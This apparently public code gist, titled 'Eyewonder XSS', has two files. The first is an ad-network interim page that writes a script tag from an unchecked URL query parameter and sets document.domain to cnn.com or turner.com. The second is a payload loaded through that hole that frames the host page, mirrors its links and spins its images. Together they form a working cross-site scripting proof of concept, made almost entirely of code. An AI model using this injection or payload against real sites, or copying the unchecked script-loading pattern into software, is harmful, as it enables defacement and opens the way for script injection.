public
Last active

Eyewonder XSS

  • Download Gist
eyewonder.js
JavaScript
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27
document.write('<style type="text/css">body{padding); margin:0}</style>');
document.write('<iframe id="iwonder_hack" src="http://' + location.host + '/" width="100%" height="100%" style="border:0;padding:0;margin:0"></iframe>');
setTimeout(function(){
var frmdoc = document.getElementsByTagName('iframe')[0].contentWindow.document
,rotation = 0
,links = frmdoc.getElementsByTagName('a')
,images = frmdoc.getElementsByTagName('img')
,props = ['transform', 'WebkitTransform', 'msTransform', 'MozTransform', 'OTransform']
,transform = function(elem, trans) {
for (var i = 0; i < props.length; i++) {
if (typeof elem.style[props[i]] != "undefined") {
elem.style[props[i]] = trans;
return;
}
}
};
for (var i = links.length - 1; i >= 0; i--) {
links[i].style.display = 'inline-block';
transform(links[i], 'scaleX(-1)');
}
setInterval(function() {
rotation++;
for (var i = images.length - 1; i >= 0; i--) {
transform(images[i], 'rotate(-' + (rotation) +'deg)');
}
}, 50);
}, 1000);
interim.html
HTML
1 2 3 4 5 6 7 8 9 10 11 12 13
<script language="JavaScript">
var cnnDocDomain = '';
if(location.hostname.indexOf('cnn.com')>0) {cnnDocDomain='cnn.com';}
if(location.hostname.indexOf('turner.com')>0) {if(document.layers){cnnDocDomain='turner.com:'+location.port;}else{cnnDocDomain='turner.com';}}
if(cnnDocDomain) {document.domain = cnnDocDomain;}
 
var query = window.location.search;
var adUrl = query.substring(5, query.length);
var clickthru;
var failclickthru;
document.write('<s'+'cript language="JavaScript" src="');
document.write(adUrl+'"></s'+'cript>');
</script>

Please sign in to comment on this gist.

Something went wrong with that request. Please try again.